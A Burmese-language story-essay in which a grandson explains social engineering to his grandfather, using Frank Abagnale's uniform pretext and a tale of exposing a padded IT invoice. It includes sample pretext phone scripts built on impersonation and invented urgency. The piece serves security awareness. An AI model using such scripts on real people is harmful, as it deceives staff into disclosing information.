ေနာက္တစ္ခု ပုိၿပီးသိသာတာကုိ အဖုိးကုိေၿပာၿပဦးမယ္။ ဖရန္႕ခ္က သူ႕လုပ္ငန္းေတြကုိ စတင္ေနတဲ့အခ်ိန္ေပါ့။ သူ PAN AM ရဲ႕ ေလယာဥ္မွဴး တစ္ေယာက္ ၿဖစ္ဖုိ႔ PAN AM ရဲ႕ ယူနီေဖာင္းအစစ္ရဖုိ႔လုိအပ္ခဲ့တာေၾကာင့္ PAN AM ကုိ ဖုန္းဆက္ခဲ့ပါတယ္။

ဧည့္ၾကို။  ။ ပန္အမ္ကပါ၊ ဘာမ်ားကူညီရမလဲရွင္။

ဖရန္႔ခ္။    ။ ယူနီေဖာင္းကိစၥေလးေၿပာခ်င္လုိ႔၊ ေခၚလုိက္တာပါ ခင္ဗ်ာ။

ဧည့္ၾကိဳ။  ။ အ၀ယ္ဌာနကုိ ဖုန္းလြွဲေပးပါမယ္။

အ၀ယ္ဌာန။   ။ ဘာမ်ားကူညီရမလဲ ရွင္။

ဖရန္႔ခ္ (ေတာင္ပုိင္းေလသံဖမ္း၍) ။        ။ ကြ်န္ေတာ္က လက္ေထာက္ေလယာဥ္မွဴးပါခင္ဗ်ာ၊ ညက နယူးေရာက္ခ္ ကုိပ်ံသန္းခဲ့တာပါ၊ ဒါေပမယ့္ ပဲရစ္ကုိ သံုးနာရီအတြင္းကြ်န္ေတာ္ ၿပန္ထြက္ရမယ္ ခင္ဗ်။ ၿပႆနာက၊ ကြ်န္ေတာ့္ ယူနီေဖာင္းေတြကုိ ေလွ်ာ္ဖုိ႔ ဟုိတယ္ကေန ပုိ႔လုိက္ပါတယ္၊ ဒါေပမယ့္ အဲဒီမွာ ေပ်ာက္သြားတယ္ ထင္တယ္။

အ၀ယ္ဌာန။   ။ သူတုိ႔ ယူနီေဖာင္းေတြကုိ အၿမဲေဖ်ာက္ေနက်ပါ။ မပူပါနဲ႕ရွင္၊ ကုိးလမ္း နဲ႔ ဘေရာ့ဒ္ေ၀း နားက well-build ယူနီေဖာင္းကုမၸဏီကုိ သြားလုိက္ပါ၊ Mr. Rosen ကုိ ရွင္ေရာက္လာမယ့္အေၾကာင္း ကြ်န္မ မွာထားေပးပါမယ္။

ေနာက္ဆံုးမွာ၊ သူ PAN AM ရဲ႕ ေလယာဥ္မွဴးယူနီေဖာင္း ရသြားတာေပါ့။ ဒါဟာ social engineering ပါပဲ အဖုိး။ ဖရန္႔ခ္ က ယံုၾကည္မွႈရွိသူ တစ္ေယာက္ပါ။ ဟုတ္ပါတယ္၊ ယံုၾကည္မွႈ  ရွိသူ (con man) social engineering လုပ္ဖုိ႔ ဒါဟာအဓိက လုိအပ္တဲ့ အရည္အခ်င္းပဲ၊ အဖုိးေရ။” လုိ႔ မင္းေမာင္ေမာင္က social engineering အေၾကာင္းကုိ သူ႔ရဲ႕ အၾကိုက္ဆံုး ဇာတ္လမ္းတစ္ခုနဲ႔ ဥပမာေပးၿပီးရွင္းၿပခဲ့ပါတယ္။ ၿပီးေတာ့….

“လူသိမ်ားတဲ့ social engineer ေတြ ထဲမွာ Frank Abagnale လည္းပါခဲ့ပါတယ္။ ေနာက္ၿပီး Kevin Mitnick ဆုိရင္ ကြန္ၿပူတာဟက္ကင္းနဲ႔ လံုၿခံဳေရးကုိ ေလ့လာေနသူေတြနဲ႔ နည္းပညာသမားေတြ ပုိသိၾကတယ္ဗ်။ ေက်ာ္ၾကားတဲ့ social engineering နည္းလမ္း တစ္ခ်ိဳ႕ကုိ အဖုိးကုိ ထပ္ေၿပာၿပမယ္ဗ်။” လုိ႔ မင္းေမာင္ေမာင္က ဆက္ေၿပာရင္း သူ႔ရဲ႕ presentation ဖုိင္တစ္ခုကုိဖြင့္လုိက္ပါတယ္။

ေက်ာ္ၾကားတဲ့ Social engineering နည္းလမ္းမ်ား”………

ေနရာတုုိင္းမွာ၊ လံုၿခံဳေရးလုိေနတယ္ဆုိတာ၊ ခင္ဗ်ားပံုေဖၚၾကည့္ဖူးပါသလား?

Security Everywhere

ဒီေန႔ေခတ္ကုိ၊ သီအုိရီအရ နည္းပညာေခတ္လုိ႕ ေခၚၾကပါတယ္။ ဒါေပမယ့္၊ နည္းပညာဆုိတာဘာေတြလဲ? လူေတြက နည္းပညာလုိ႕ေၿပာလုိက္တာနဲ႕ ကြန္ၿပဴတာေတြ၊ ၀က္ဘ္ဆုိဒ္ေတြ၊ ကြန္ယက္ခ်ိတ္ဆက္မႈေတြ၊ ပရိုဂရမ္ေတြကုိပဲ ၿမင္ၾကပါတယ္။ နည္းပညာဆုိတာ အဲဒီထက္ပုိပါတယ္။ ကြန္ၿပဴတာ –တြက္ခ်က္မႈမ်ားစြာကုိ အခ်ိန္နဲ႕အမွ်အၿမန္ဆံုးတြက္ခ်က္၊ အေၿဖထုတ္ေပးပါတယ္။ ၀က္ဘ္ဆုိဒ္ –အခ်က္အလက္ေတြရွာေဖြဖုိ႕ ကြ်န္ေတာ္တုိ႕သံုးေလ့ရွိၾကတယ္ — ၎က သိပၸံပညာရွင္ေတြ၊ အခ်င္းခ်င္း စမ္းသပ္မႈေတြ ဖလွယ္ဖုိ႕ နည္းလမ္းေတြ ရွာေဖြရင္းက အစၿပဳခဲ့တာလုိ႕ ေၿပာႏုိင္ပါတယ္။ ကြန္ယက္ခ်ိိတ္ဆက္မႈ — ဟုတ္ပါတယ္၊ အခ်က္အလက္ေတြ အၿမန္ဆံုးဖလွယ္ႏုိင္ဖုိ႔၊ ဆက္သြယ္ေရးစနစ္ ေကာင္းေကာင္းတစ္ခုလိုတာေပါ့။ ပရိုဂရမ္ — အစီအစဥ္လုိ႕ ဘာသာၿပန္ႏုိင္ပါတယ္ — ၎က၊ အစီအစဥ္ နံပါတ္တစ္ခုၿပီးရင္ေနာက္တစ္ခုကဘာၿဖစ္မယ္၊ တကယ္လုိ႔မ်ား၊ အစီအစဥ္တစ္ခုရဲ႕ ေနာက္ဆက္တြဲက၊ သတ္မွတ္မႈတစ္ခုခုနဲ႕ ကုိက္ညီတယ္ဆုိရင္၊ အစီအစဥ္ နံပါတ္ဘယ္ေလာက္ကုိ စတင္မယ္၊ အဲလုိမဟုတ္ရင္ေတာ့ အစီအစဥ္နံပါတ္ဘယ္ေလာက္ကုိ၊ စတင္ရမယ္ စတဲ့၊ အစီအစဥ္ေတြကုိ ဆက္တုိက္လုပ္ေဆာင္ႏုိင္ဖုိ႕ ၾကိဳတင္အစီအစဥ္ခ်ထားတဲ့ ၾကားခံတစ္ခုပါပဲ။
ဒါဆုိ၊ ဟုတ္ပါတယ္၊ ကြ်န္ေတာ္တုိ႕ ေတြးရမွာ နည္းပညာဆုိတာကုိေပါ့။ ကြန္ၿပဴတာေတြ၊ ကြန္ယက္ေတြ၊ ၀က္ဘ္ေတြ နဲ႕ ပရိုဂရမ္ေတြက ဘာအတြက္ ေပၚေပါက္လာတာလဲ၊ ဘာရည္ရြယ္ခ်က္နဲ႕လဲ? ဟုတ္ပါတယ္၊ မိနစ္တုိင္းမွာ၊ မ်က္စိတစ္မွိတ္တုိင္း ေၿပာင္းလဲေနတဲ့ တုိးတက္မႈနဲ႕အတူ ေတြ႕ၾကံဳလာရတဲ့ လုိအပ္ခ်က္ေတြ၊ အခက္အခဲေတြကုိ၊ ေၿဖရွင္းႏိုင္ဖုိ႕ နည္းလမ္းေတြကုိ တည္ေဆာက္ၿပီး၊ အသံုးၿပဳလာၾကပါတယ္။
ကြန္ၿပဴတာဆုိတာကုိေတြးၾကည့္ရေအာင္၊ — လက္ႏွိပ္စက္တစ္လံုးကုိ စြဲစဲြလမ္းလမ္းသံုးေနတဲ့ စာေရးဆရာအဖုိးက၊ ေၿမးလုပ္သူ မင္းေမာင္ေမာင္ကုိ “ေၿမးေရ၊ မင္းေၿပာေၿပာေနတဲ့ ကြန္ၿပဴတာက ငါ့ လက္ႏွိပ္စက္နဲ႕ ဘာမ်ား ကြာၿခားလုိ႕လဲကြာ၊ လက္ကြက္ပံုစံကုိက ငါ့ ေဘာ္ဒါၾကီး ကုိ အတုယူထားတာပါကြာ” လုိ႕ေမးခဲ့ပါတယ္။ — ခင္ဗ်ားဆုိရင္ေရာ၊ ဘာၿပန္ေၿဖမလဲ “ဟုတ္ကဲ့၊ ကြ်န္ေတာ့ ကြန္ၿပဴတာက၊ လက္ႏွိပ္စက္ထက္သာတယ္၊ သူက၊ လက္ႏွိပ္စက္အၿပင္ တီဗီြတစ္လံုးပါတယ္ဗ်” လုိ႕ေတာ့ ခင္ဗ်ားမေၿဖေလာက္ပါဘူးေနာ္?– “ကြန္ၿပဴတာက တြက္ခ်က္မႈ ပရိုဂရမ္ေတြပါတယ္ဗ်၊ အဖုိး ေခါင္းထဲမွာ၊ စာရြက္ေပၚမွာ တြက္ခ်က္မႈေတြလုပ္ၿပီး၊ လက္ႏွိပ္စက္ၾကီးနဲ႕ စာရိုက္ ၿပီးေတာ့၊ ဖုိင္ၾကီးေတြ၊ ဘီဒိုၾကီးေတြနဲ႕ ရိုက္ထားတဲ့စာေတြသိမ္း၊ အဲဒီအထဲက၊ လုိအပ္တာကုိ ၿပန္ရွာဖုိ႕၊ တစ္ေန႕လံုးအခ်ိန္ယူရတာမ်ိဳးမဟုတ္ေတာ့ဘူး၊ စာရိုက္တာ၊ ရိုက္ဖုိ႕ ကိန္းဂဏန္းေတြ၊ စာလံုးေရေတြ စသၿဖင့္ေတြကုိ ရိုက္ေနရင္းတစ္ခါထဲ၊ တြက္ခ်က္ႏုိင္ၿပီး၊ ရိုက္ထားတဲ့ အခ်က္အလက္ေတြကုိ သိမ္းဖုိ႕၊ ဘီဒိုၾကီးေတြ၊ ဖုိင္ၾကီးေတြမလုိေတာ့ဘူး၊ လိုအပ္တာၿပန္ရွာမယ္ဆုိရင္လဲ ရွာေဖြေရး ပရိုဂရမ္ေတြပါတယ္၊ ၿပီးေတာ့၊ အဖုိးေရ၊ ကာဗြန္လည္း ခဏခဏလည္းဖုိ႕မလုိေတာ့ဘူးေလဗ်။ အေရးၾကီးတဲ့၊ လံုၿခံဳေရးနည္းလမ္းကုိလည္း၊ အဖုိးကုိယ္တုိင္ပံုစံခ်ၿပီး၊ လြယ္လြယ္ေလး အသံုးၿပဳႏုိင္တယ္ဗ်၊ ဥပမာ – အဖုိး အခ်ိန္ကုန္ခံၿပီးရုိက္ထားတဲ့ အခ်က္အလက္ေတြကုိ၊ မေပ်ာက္သြားေအာင္၊ ပ်က္စီးမသြားေအာင္၊ အလြယ္ေလး ပံုတူပြားၿပီး၊ တၿခားတစ္ေနရာရာမွာ သိမ္းထားႏုိင္ေသးတယ္၊ အရံထားရွိၿခင္း (back up) လုိ႕ေခၚတယ္ဗ်” ေၿမးကေၿဖခဲ့ပါတယ္။ အခု၊ အဖိုးက ကြန္ၿပဴတာ စတင္သံုးဖုိ႕ စဥ္းစားခဲ့ပါတယ္။
ဒါေပမယ့္၊ အဖုိးက “backup ဟုတ္လား?” အဖုိးေခါင္းထဲမွာ စဥ္းစားစရာနည္းနည္းရွိလာပါၿပီ။ “ဘာလုိ႕ အရံထားတာလဲ၊ မင္းတုိ႕ ကြန္ၿပဴတာ ဆုိတာ၊ ငါ့ သံဘီဒုိၾကီးေတြေလာက္ စိတ္မခ်ရဘူးလားကြ?” ေၿမးလုပ္သူလဲေတာ္ေတာ္စဥ္းစားရ ခက္သြားပါတယ္။ ဒါေပမယ့္ ေၿမးက– မဆုိင္းမတြပဲ —
“အဖုိးေရ၊ လံုၿခံဳေရးအတြက္ပါ။ အဖုိးေၿပာတဲ့ သံဘီဒိုၾကီးကုိပဲ စဥ္းစားၾကည့္ပါ၊ အဖုိးရဲ႕ အခ်က္အလက္ေတြကုိ သံဘီဒိုၾကီးထဲမွာ၊ ေသာ့ၾကီးၾကီးခတ္ၿပီးသိမ္းထားေပမယ့္၊ အဖုိးရဲ႕ ၿပိဳင္ဖက္တစ္ဦးက၊ စာမႈပုိ႕ဖုိ႕ ရက္ခ်ိိန္းနီးမွ အဖုိးသံဘီဒိုေသာ့ကုိ ဖ်က္ဆီးၿပီး၊ အဖုိးရဲ႕ လေပါင္းမ်ားစြာ၊ ႏွစ္ေပါင္းမ်ားစြာ ေရးထားတဲ့ စာမႈေတြ၊ သီအုိရီေတြ၊ အဖုိးဉာဏ္ကြန္႕ၿမဴးထားတဲ့ အေရးအသားေတြကုိ၊ ခုိးယူသြားမယ္၊ ဒါမွမဟုတ္၊ ဖ်က္စီးခဲ့မယ္ဆုိရင္၊ အဖုိးက၊ သံဘီဒိုၾကီးေရွ႕မွာ၊ စိတ္ဓါတ္က်စြာနဲ႕ ထုိင္မႈိင္ေနၿပီး၊ အဖုိးရဲ႕ဖန္တီးမႈေတြအားလံုး ဆံုးရႈံးသြားၿပီလုိ႕၊ သိတဲ့အခ်ိန္၊ ၿပန္ရႏုိင္မယ့္ နည္းလမ္းေလးမ်ား ရွိမလားလုိ႕ ေမွ်ာ္လင့္မိလာပါလိမ့္မယ္။ တကယ္လုိ႕သာ၊ ပံုတူပြားထားခဲ့ရင္ ဆိုတဲ့ အေတြးေတြ ေတြးမိလာမယ္၊ ဆုိတာ ကြ်န္ေတာ္ေသခ်ာေၿပာႏုိင္တယ္။” လုိ႕ မင္းေမာင္ေမာင္က သြက္လက္စြာရွင္းၿပခဲ့ ပါတယ္။
ဒါပါပဲ၊ ကြ်န္ေတာ္တုိ႕ေန႕စဥ္ၿဖတ္သန္းေနရတဲ့၊ ပတ္၀န္းက်င္ကလည္း၊ ေၿပာင္းလဲတုိးတက္မႈၿဖစ္စဥ္တစ္ခုပါပဲ။ ကြ်န္ေတာ္တုိ႕ ကာကြယ္ခ်င္တာ ေတြ၊ ဆံုးရႈံးမွာေၾကာက္ၾကတာေတြ၊ ေနာက္ေၾကာင္းၿပန္လွည့္ဖုိ႕ ၀န္ေလးၾကတာေတြ၊ ၿဖတ္သန္းခဲ့ရတဲ့ အခ်ိန္ေတြကုိ တန္ဖုိးထားၾကရတာေတြ စတဲ့၊ အေၾကာင္းအမိ်ဳးမ်ိဳးေတြက၊ ကြ်န္ေတာ္တုိ႕ အေတြးေတြထဲမွာ၊ လံုၿခံဳေရးဆုိတဲ့ စကားလုံးကုိ ထင္ရွားလာေစပါတယ္။
လံုၿခံဳေရးဆုိတာ၊ မလုိအပ္ေသးပါဘူး၊ ငါ့ကုိေတာ့ ဘယ္သူမွ အခ်ိန္ကုန္ခံၿပီး၊ အားနည္းခ်က္ရွာေနမွာမဟုတ္ဘူးလုိ႕ခင္ဗ်ားေတြးရင္၊ ခင္ဗ်ားေန႕စဥ္ဘာလုိ႕ အ၀တ္အစားေတြ၀တ္တာလဲ၊ ခင္ဗ်ား ရံုးစားပြဲခံုကုိ၊ ခင္ဗ်ားရံုးဆင္းရင္ ဘာလုိ႕ ေသာ့ခတ္ခဲ့တာလဲ၊ ခင္ဗ်ားအိမ္မွာမရွိတဲ့ အခ်ိန္မွာေရာ၊ ဘာလုိ႕ အိမ္တံခါးကုိ ေသာ့ခတ္တာလဲ၊ ခင္ဗ်ား အၿပင္သြားရင္ဘာလို႕ ဖိနပ္စီးသြားတာလဲ၊ ေနပူရင္ သုိ႔မဟုတ္ မုိးရြာရင္ ဘာလုိ႕ ထီးေဆာင္းၾကတာလဲ၊ ခင္ဗ်ားေနပူစာလံုရင္ေတာင္၊ ဘာလုိ႔ ေနေလာင္ခံကရင္ေတြ လိမ္းတာလဲ၊ ဘာလုိ႕ေနကာမ်က္မွန္ေတြ တပ္ထားတာလဲ၊ ခင္ဗ်ားသြားေနတဲ့လမ္းမွာ၊ ၿဖတ္သြားတဲ့ကားရဲ႕ မီးခုိးေငြ႕ေတြ က်န္ခဲ့ရင္၊ ခင္ဗ်ား ႏွာေခါင္းနဲ႕၊ ပါးစပ္ကုိ ဘာလုိ႕အုပ္လုိက္တာလဲ၊ ဆုိတာေတြပါ ထည့္သြင္းစဥ္းစားၾကည့္ေပးပါ။ ခင္ဗ်ားရဲ႕ အိမ္နီးခ်င္းက၊ ခင္ဗ်ား အိမ္က ၾကိဳးမဲ့ကြန္ယက္ထုတ္လႊင့္ထားတာကုိၿမင္ရင္၊ သူပထမဆံုး စဥ္းစာတာက၊ ဘာမ်ားၿဖစ္လိမ့္မလဲလုိ႕ ခင္ဗ်ားသိခ်င္စိတ္ၿဖစ္ဖူးပါသလား?

ရိုက္စားလုပ္တဲ့ အိုင္တီငနဲ

scamIT

“အဖုိးေရ၊ ဒီမွာ ကြ်န္ေတာ့္ရဲ႕ presentation ေလး အေၾကာင္းေၿပာၿပပါရေစ” ေၿပာရင္း မင္းေမာင္ေမာင္က presentation ကုိစတင္လုိက္ပါ တယ္။
မိတ္ဆက္ၿခင္း ။ ။ ကြ်န္ေတာ္က မင္းေမာင္ေမာင္ပါ၊ ဆိုက္ဘာ လံုၿခံဳေရးအေၾကာင္းကုိ ေလ့လာေနသူတစ္ဦးၿဖစ္ပါတယ္။ ကြ်န္ေတာ့္ ေလ့လာမႈေတြကေတာ့ “ဂူဂယ္” မွာ ရွာေဖြေလ့လာတာပါ၊ ၿပီးေတာ့၊ အဓိကရင္းၿမစ္ကေတာ့၊ Hacker High School (www.hackerhighschool.org) မွာေလ့လာသင္ယူၿဖစ္တာ ပိုမ်ားပါတယ္။ သူတုိ႕ကေတာ့ အက်ိဳးအၿမတ္အတြက္လုပ္တဲ့ အဖဲြ႕အစည္း မဟုတ္ပါဘူး၊ အရာ၀တၱဳေတြ ဘယ္လုိ အလုပ္လုပ္ၾကတယ္ဆုိတာကုိ၊ ပံုေဖၚၿခင္းနည္းလမ္းတစ္ခုအၿဖစ္ ဟက္လုပ္ၿခင္းအားေလ့လာႏုိင္ရန္ ဆယ္ေက်ာ္သက္ေတြကို ကူညီေပးၿပီး၊ အခုဆုိ HHS အကယ္ဒမီေက်ာင္း စတင္ဖုိ႕လုပ္ေနၿပီး၊ ဗြီဒီယုိသင္ခန္းစာေတြလည္း ရေတာ့မယ္။ ၿပီးေတာ့၊ ကြ်န္ေတာ္တုိ႕လုိ အခက္အခဲရွိသူေတြအတြက္ အခမဲ့သင္ခန္းစာေတြ ပုိ႕ခ်ေပးပါတယ္။ သူတုိ႕ရဲ႕ ေဆာင္ပုဒ္တစ္ခုနဲ႕ ဟက္ကင္းအေပၚ ခံယူခ်က္ကုိ အတိုခ်ံဳးအားၿဖင့္ ေၿပာၿပပါရေစ။ “အရာရာတုိင္းကုိ ဟက္ပါ ဒါေပမယ့္ မထိခုိက္ပါေစနဲ႕” ၊ ၿပီးေတာ့ “ဟက္ကင္းဆုိတာ ၿပႆနာေၿဖရွင္းၿခင္း နဲ႕ ေလ့လာသင္ယူၿခင္း ၿဖစ္ပါတယ္။” သိပ္မၾကာခင္မွာ၊ HHS ရဲ႕ ပေရာဂ်က္မန္ေနဂ်ာ တည္ေထာင္ေနတဲ့ (S4H) www.schoolforhackers.org မွာလည္း ဗီြဒီယိုသင္ခန္းစာေတြနဲ႕၊ ေလ့လာ သင္ယူ မႈေတြ လုပ္ႏုိင္ေတာ့မွာပါ။
အေၾကာင္းအရာ ။ ။ ကြ်န္ေတာ္ ေၿပာၿပမယ့္အရာကေတာ့၊ ကုမၸဏီတစ္ခုမွာ နည္းပညာကုိနားမလည္လုိ႕၊ ကိုယ့္အေပၚ ယံုၾကည္အားကုိး ထားတဲ့ သူေတြအေပၚ ရိုက္စားလုပ္သြားတဲ့ အလုိၾကီးအရနဲ အုိင္တီသမား တစ္ေယာက္အေၾကာင္းပဲၿဖစ္ပါတယ္။
လုပ္ငန္းစလိုက္ရေအာင္
တစ္စံုတစ္ဦးထံမွ၊ ကုန္က်စရိတ္အေၾကာင္းကုိၾကားလုိက္ရတဲ့အခါ စံုစမ္းသူ မ်က္လံုးၿပဴးသြားခဲ့ပါတယ္ “point to point ၾကိဳးမဲ့ ခ်ိတ္ဆက္မႈ ကုန္က်စရိတ္က၊ ေဒၚလာသံုးေထာင္ ဟုတ္လား? အကြာအေ၀းက ဘယ္ေလာက္လဲ၊ ၾကားမွာ ကြယ္ေနတဲ့ အေဆာက္အဦးေတြ ရွိလား? ၿပီးေတာ့၊ ဘာပစၥည္းေတြ သံုးထားလဲ?” ဟု စံုစမ္းသူက ဆက္ေမးခဲ့ပါတယ္။ “အဲ၊ အကြာအေ၀းက ကားလမ္းအားၿဖင့္ ၅.၆ ကီလုိမီတာ၊ ဒါေပမယ့္ တုိက္ရိုက္ ၿမင္ေနရတာေၾကာင့္ အတုိင္းအတာအားၿဖင့္ ၃ ကီလုိမီတာ ေက်ာ္ေက်ာ္ေလာက္ ေ၀းတယ္၊ သံုးထားတဲ့ ပစၥည္း ကုိေတာ့အတိအက် မသိေသးဘူး။” ဟု တစ္စံုတစ္ဦးက ေၿဖခဲ့ပါတယ္။ စံုစမ္းသူက ၎ အရင္အလုပ္လုပ္ခဲ့တဲ့ ကုမၸဏီၿဖစ္ေနတာေၾကာင့္၊ ကုမၸဏီ abc အတြက္၊ စံုစမ္းရန္ ဆံုးၿဖတ္ခဲ့ပါတယ္။ ၿပီးေတာ့ ခ်က္ခ်င္း ဆုိသလုိ ထုိကုမၸဏီ abc ၏ အတြင္းေရးမႈဆီကုိ ဖုန္းအဆက္အသြယ္ လုပ္ခဲ့ပါတယ္၊ ဒါေပမယ့္ ဒီအေၿခအေနမွာ သိကြ်မ္းၿပီးသား ဆုိေပမယ့္ ဘယ္သူ႕ကုိမွ ယံုၾကည္လုိ႕ မရေသးတာေၾကာင့္ လူမႈေရးကုိ လုပ္ဇာတ္ခင္းၿခင္း (social engineering) ကုိ အသံုးၿပဳခဲ့ပါတယ္။
စကားစၿမည္ –
“ စံုစမ္းသူ ။ ။ အတြင္းေရးမႈးေရ၊ မေတြ႕တာၾကာၿပီ။ အားလံုးေနေကာင္းၾကလား?
အတြင္းေရးမႈး။ ။ ဟုတ္ကဲ့၊ ေကာင္းၾကပါတယ္။ အကုိေရာ၊ ဘာေတြလုပ္ေနလဲ?
စံုစမ္းသူ။ ။ အခုေတာ့၊ point to point wireless နက္ေ၀ါ့ခ္တစ္ခု၊ လုပ္ဖုိ႕လုိလုိ႕ အဖြဲ႕ေတြလုိက္စံုစမ္းေနတာ၊ ဒါေပမယ့္၊ ဖုန္းေတြက ဆက္လုိ႕မရၿဖစ္ေနတာနဲ႕၊ ဘာမွကိုမစံုစမ္းရေသးဘူးဗ်ာ၊ လူၾကီးကလဲ စံုစမ္းေပးဖုိ႕ ေလာေနၿပီေလ၊ ဒါနဲ႕ တေလာကပဲ အဲဒီမွာ၊ ခ်ိတ္ထားတယ္ ၾကားလုိ႕၊ လူၾကီးကုိၿပန္ေၿပာဖုိ႕ ခန္႕မွန္း၊ ကုန္က်စရိတ္နဲ႕၊ သံုးထားတဲ့ ပစၥည္းေလးမ်ား သိမလားလုိ႕၊ အကူအညီေတာင္းမလုိ႕ ဆက္လုိက္တာဗ်။ အပန္းမၾကီးရင္ ကူညီပါဦး ဗ်ာ။
အတြင္းေရးမႈး။ ။ ဟုတ္တယ္၊ တေလာကပဲ တပ္ဆင္ၿပီးတယ္။ ရပါတယ္၊ ကူညီႏုိင္ပါတယ္၊ ဒါေပမယ့္ ဘာေတြဆုိတာေတာ့မေၿပာတတ္ဘူး ရံုးက IT Manager တင္ထားတဲ့ ေစ်းႏႈန္းစာရင္းေတာ့ရွိတယ္၊ အီးေမးလ္ ပုိ႕ေပးလုိက္မယ္ေလ။
စံုစမ္းသူ။ ။ ေက်းဇူးတင္လုိက္တာဗ်ာ၊ “
မၾကာခင္မွာပဲ၊ ေစ်းႏႈန္း စာရြက္ နဲ႕ သံုးထားတဲ့ပစၥည္း စာရင္း ၊ email ေရာက္လာပါတယ္။ စံုစမ္းသူက၊ secretary@abc.com ဆုိတဲ့ေမးလ္ကုိ ရင္ခုန္စြာနဲ႕ ပဲဖြင့္လုိက္ပါတယ္၊ “ဟာ၊ သံုးထားတဲ့ ပစၥည္းေတြက point to point အတြက္မွ ဟုတ္ရဲ႕လား? ၿပီးေတာ့ ၀ယ္တဲ့ ဆုိင္နာမည္ရဲ႕ စာေခါင္းစည္း ၾကည့္ရတာလဲ တစ္ခုခုမွားေနသလုိပဲ”

Y ကုမၸဏီ
သုိ႕ : အိုင္တီ မန္ေနဂ်ာ (abc ကုမၸဏီ)
အေၾကာင္းအရာ။ ။ point to point wireless ခ်ိတ္ဆက္မႈ အတြက္ ကုန္က်စရိတ္

# Item # Description Qty per Item Total
1 AM-5G20-90 4.9-5.9GHz airMAX Base Station, 1 850 850
Cisco Air 20dBi, 90 deg w/ rocket kit
2 ROCKETM5 5GHz Rocket MIMO, airMAX 1 350 350
3 PBM5 5GHz PowerBridge MIMO, airMAX 1 650 650
4 TC-Carrier TOUGH Cable, Level 2 1 100 100
6 IL-SRV2 Complete Setup Installation 1 1000 1000
TOTAL US$ 2950

“အင္း ေသခ်ာၾကည့္ရင္ ေခါင္းစီးက ၀ါးေနသလုိပဲ၊ scan ဖတ္ၿပီး၊ ၿပန္ၿပင္ထားပံုရတယ္၊ ေသခ်ာတာကေတာ့ နံပါတ္ ၁. AM-5G20-90 က Ubiquiti model ပါ၊ Cisco Air ဆုိတာ ဘာၾကီးလဲ? ေနာက္ၿပီး TC-Carrier က ဘာလုိ႕အဲဒီေလာက္ေတာင္ လုိအပ္တာလဲ?” အဲဒီကုမၸဏီကုိ ဖုန္းဆက္ၿပီး တစ္ခုခု သိေအာင္ၾကိဳးစားၾကည့္ဖုိ႕၊ စံုစမ္းသူက ဆံုးၿဖတ္လုိက္ပါတယ္။
စံုစမ္းၿခင္း တစ္နည္းဆုိရင္ လူမႈေရးလုပ္ဇာတ္တစ္ခု။
စံုစမ္းသူ။ ။ ဟလုိ၊ Y ကုမၸဏီကပါလား?
Y ကုမၸဏီ။ ။ ဟုတ္ကဲ့၊ ဘာမ်ားကူညီရမလဲ ခင္ဗ်ာ?
စံုစမ္းသူ။ ။ ကြ်န္ေတာ္က ကုမၸဏီ abc က နည္းပညာ အၾကံေပးပါ။ ကြ်န္ေတာ္တုိ႕ ကုမၸဏီက တေလာက ခင္ဗ်ားတုိ႕ဆီက၊ wifi ၀န္ေဆာင္မႈကုိ၀ယ္ယူ ထားပါတယ္၊ အခု ကုမၸဏီ စာရင္းစစ္ဌာနက၊ အသံုးစရိတ္ အစည္းအေ၀းမွာ တင္ၿပဖုိ႕၊ ေၿပစာေလးေတာင္းလာလုိ႕ပါ။ ကြ်န္ေတာ္တုိ႕ အုိင္တီ မန္ေနဂ်ာက၊ နယ္ခရီးလမ္းမွာေရာက္ေနေတာ့၊ ဆက္သြယ္လုိ႕မရဘူးၿဖစ္ေနပါတယ္။ ေက်းဇူးၿပဳၿပီး၊ အဲဒီေၿပစာေကာ္ပီေလးကုိ၊ ကြ်န္ေတာ္တုိ႕ ရံုးရဲ႕ စီမံဌာနကုိ၊ ေမးလ္ပုိ႕ေပးဖုိ႕ အကူအညီေတာင္းခ်င္လုိ႕ပါ။ ကူညီေပးႏုိင္မလား ခင္ဗ်ာ?
Y ကုမၸဏီ။ ။ ကြ်န္ေတာ္တုိ႕၊ အေရာင္း မန္ေနဂ်ာကုိ အတည္ၿပဳၿပီး ရင္ၿပန္ဆက္သြယ္ေပးပါမယ္။
စံုစမ္းသူ။ ။ ၿဖစ္ႏုိင္ရင္ ဖုန္းကုိင္ထားပါရေစ၊ အခု ကြ်န္ေတာ္တုိ႕ ဒါရိုက္တာကလည္း ကုမၸဏီအသံုးစရိတ္ အစည္းအေ၀း အတြက္ ေစာင့္ေနတာေၾကာင့္၊ အခက္အခဲရွိေနလုိ႕ပါ။ ဒါမွမဟုတ္၊ အဲဒီတုန္းက စုစုေပါင္းကုန္က် စရိတ္ကုိပဲ အခုေၿပာေပးလုိ႕ရႏိုင္မလား၊ ခင္ဗ်ာ။
Y ကုမၸဏီ။ ။ ကြ်န္ေတာ္တုိ႕ အခုပဲ အေၾကာင္းၾကားၿပီး၊ ဖုန္းလႊဲေပးလုိက္ပါမယ္၊ ခဏေစာင့္ပါ ခင္ဗ်ာ။
Y ကုမၸဏီ အေရာင္းမန္ေနဂ်ာ။ ။ ကြ်န္ေတာ္တုိ႕ ကူညီေပးႏုိင္ပါတယ္၊ အဲဒီတုန္းက စုစုေပါင္းကုန္က်စရိတ္က ၁၆၀၁ ေဒၚလာပါ၊ ဒါေပမယ့္ ေကာ္ပီကုိေတာ့ စီမံဌာနရဲ႕ အီးေမးလ္လိပ္စာကုိပဲ ပုိ႕ေပးႏုိင္ပါမယ္၊ ခင္ဗ်ာ။
စံုစမ္းသူ။ ။ ဟုတ္ကဲ့၊ ေက်းဇူးတင္ပါတယ္၊ ကြ်န္ေတာ္တုိ႕ စီမံရဲ႕အီးေမးလ္လိပ္စာက secretary@abc.com ကုိ ပုိ႕ေပးပါ၊ ကြ်န္ေတာ္တုိ႕ ဒါရိုက္တာ ရံုးခန္းကုိ တုိက္ရိုက္ေရာက္ပါတယ္။
